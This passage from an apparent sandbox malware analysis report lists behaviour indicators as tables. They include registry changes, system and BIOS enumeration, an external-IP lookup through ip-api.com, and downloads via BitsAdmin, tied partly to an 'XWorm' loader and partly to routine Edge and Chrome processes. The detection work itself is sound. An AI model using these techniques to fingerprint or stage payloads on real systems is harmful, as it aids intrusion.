| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\wermgr.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
